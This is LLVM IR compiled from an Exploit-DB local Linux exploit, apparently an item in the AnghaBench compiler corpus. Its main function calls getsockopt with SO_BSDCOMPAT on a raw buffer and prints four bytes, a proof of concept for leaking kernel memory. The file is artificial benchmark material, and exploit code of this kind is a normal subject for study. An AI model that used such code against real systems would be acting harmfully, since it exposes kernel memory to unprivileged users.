; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_32805.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_32805.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@SO_BSDCOMPAT = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [10 x i8] c"%x%x%x%x\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca [4 x i8], align 1
  %2 = alloca i32, align 4
  %3 = alloca i32, align 4
  %4 = bitcast [4 x i8]* %1 to i8*
  call void @llvm.memset.p0i8.i64(i8* align 1 %4, i8 0, i64 4, i1 false)
  %5 = call i32 @socket(i32 33, i32 2, i32 2)
  store i32 %5, i32* %3, align 4
  %6 = load i32, i32* %3, align 4
  %7 = load i32, i32* @SO_BSDCOMPAT, align 4
  %8 = bitcast [4 x i8]* %1 to i8**
  %9 = call i32 @getsockopt(i32 %6, i32 1, i32 %7, i8** %8, i32* %2)
  %10 = getelementptr inbounds [4 x i8], [4 x i8]* %1, i64 0, i64 0
  %11 = load i8, i8* %10, align 1
  %12 = getelementptr inbounds [4 x i8], [4 x i8]* %1, i64 0, i64 1
  %13 = load i8, i8* %12, align 1
  %14 = getelementptr inbounds [4 x i8], [4 x i8]* %1, i64 0, i64 2
  %15 = load i8, i8* %14, align 1
  %16 = getelementptr inbounds [4 x i8], [4 x i8]* %1, i64 0, i64 3
  %17 = load i8, i8* %16, align 1
  %18 = call i32 @printf(i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str, i64 0, i64 0), i8 zeroext %11, i8 zeroext %13, i8 zeroext %15, i8 zeroext %17)
  %19 = load i32, i32* %3, align 4
  %20 = call i32 @close(i32 %19)
  ret i32 0
}

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memset.p0i8.i64(i8* nocapture writeonly, i8, i64, i1 immarg) #1

declare dso_local i32 @socket(i32, i32, i32) #2

declare dso_local i32 @getsockopt(i32, i32, i32, i8**, i32*) #2

declare dso_local i32 @printf(i8*, i8 zeroext, i8 zeroext, i8 zeroext, i8 zeroext) #2

declare dso_local i32 @close(i32) #2


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
